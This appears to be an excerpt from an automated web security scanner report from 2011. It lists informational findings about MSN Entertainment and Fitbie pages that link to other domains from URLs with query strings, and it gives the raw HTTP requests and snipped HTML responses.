Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=5">
<script type="text/javascript">
(fun
...[SNIP]...
</a> <a target=_blank href="http://www.youtube.com/?tab=o1" class=gb2>YouTube</a>
...[SNIP]...
<a title="Back to Google Docs" href="//docs.google.com/"><img border="0" id="docs-logo" src="//ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif" width="122" alt="Google Docs logo"></a>
...[SNIP]...

17.80. http://entertainment.msn.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/news/?ipp=15

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/styles/e9613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/grandprix/Digg.gif
http://entimg.s-msn.com/i/grandprix/discuss.gif
http://entimg.s-msn.com/i/grandprix/mail.gif
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/grandprix/spacesBlog.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://feeds.wonderwall.com/rss/wall.xml
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/search?q=david+arquette&form=msnena
http://www.bing.com/search?q=henry+cavill&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574360&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.msn.com%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /news/?ipp=15 HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62109
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=ac04a95fd665493fa176cf593197b9c9; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:32:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Just In Ne
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css" />

<STYLE>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574360&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.msn.com%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.msn.com"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<DIV class=titleBar3>Celebrity News, Photos..& Gossip..<a href=http://feeds.wonderwall.com/rss/wall.xml class="altlink"><IMG border=0 src="http://entimg.msn.com/i/ms/rssicon.gif">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<DIV><a href=http://www.bing.com/search?q=henry+cavill&form=msnena class="altlink">Henry Cavill</a>
...[SNIP]...
<DIV><a href=http://www.bing.com/search?q=david+arquette&form=msnena class="altlink">David Arquette</a>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

17.81. http://entertainment.msn.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The page was loaded from a URL containing a query string:

http://entertainment.msn.com/video/?from=en-us_msnhp

The response contains the following links to other domains:

http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css
http://entcss.s-msn.com/styles/e9613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a25
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574364&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.msn.com%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.msn.com%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /video/?from=en-us_msnhp HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26764
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=33e81c3f10394970acaad2e43f03eed0; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:32:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Entert
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><link href="http://entcss.s-msn.com/i/video/ent/v5/css/custom_0047.css" rel="stylesheet" type="text/css" >
<link href="http://blstc.msn.com/br/chan/css/1/cntwmodule.css" rel="stylesheet" type="text/css" />
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296574364&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.msn.com%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.msn.com%2fvideo%2f%3ffrom%3den-us_msnhp%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.msn.com"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<td valign="top"><SCRIPT type=text/javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx_Min.js"></SCRIPT>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

17.82. http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fitbie.msn.com
Path:	/lose-weight/tips/reasons-youre-destined-weight-loss-success

Issue detail

The page was loaded from a URL containing a query string:

http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://digg.com/submit?url=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002
http://images.rodale.com/dca/400Cal-navButton.gif
http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg
http://img.widgets.video.s-msn.com/js/embed.js
http://insidemsn.wordpress.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalfitlife.112.2o7.net/b/ss/msnportalfitlife/1/H.1--NS/0
http://preferences.rodale.com/
http://twitter.com/Fitbie
http://twitter.com/home?status=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002
http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix
http://www.400caloriefix.com/fl/?keycode=152106
http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Flose-weight%2Ftips%2Freasons-youre-destined-weight-loss-success&linkname=Reasons%20You%26%23039%3Bre%20Destined%20for%20Weight%20Loss%20Success%20%7C%20Fitbie
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=MBEFIT
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/home.php?
http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;
http://www.facebook.com/sharer.php?u=/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002
http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002
http://www.myhomemsn.com/
http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean
http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga
http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book
http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false
https://shop.fitbie.com/

Request

GET /lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: HIT
ETag: "1296552767-1"
Last-Modified: Tue, 01 Feb 2011 09:32:47 +0000
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=22499
Expires: Tue, 01 Feb 2011 21:47:46 GMT
Date: Tue, 01 Feb 2011 15:32:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 79922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
<a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<div class="free-trial">
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad">Get a Free Trial ></a>
<a href="http://www.walkoffweightbook.com/fl/?keycode=142336&cm_mmc=BeFit.com-_-Module-_-Homepage-_-Walk%20Off%20Weight%20Book" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
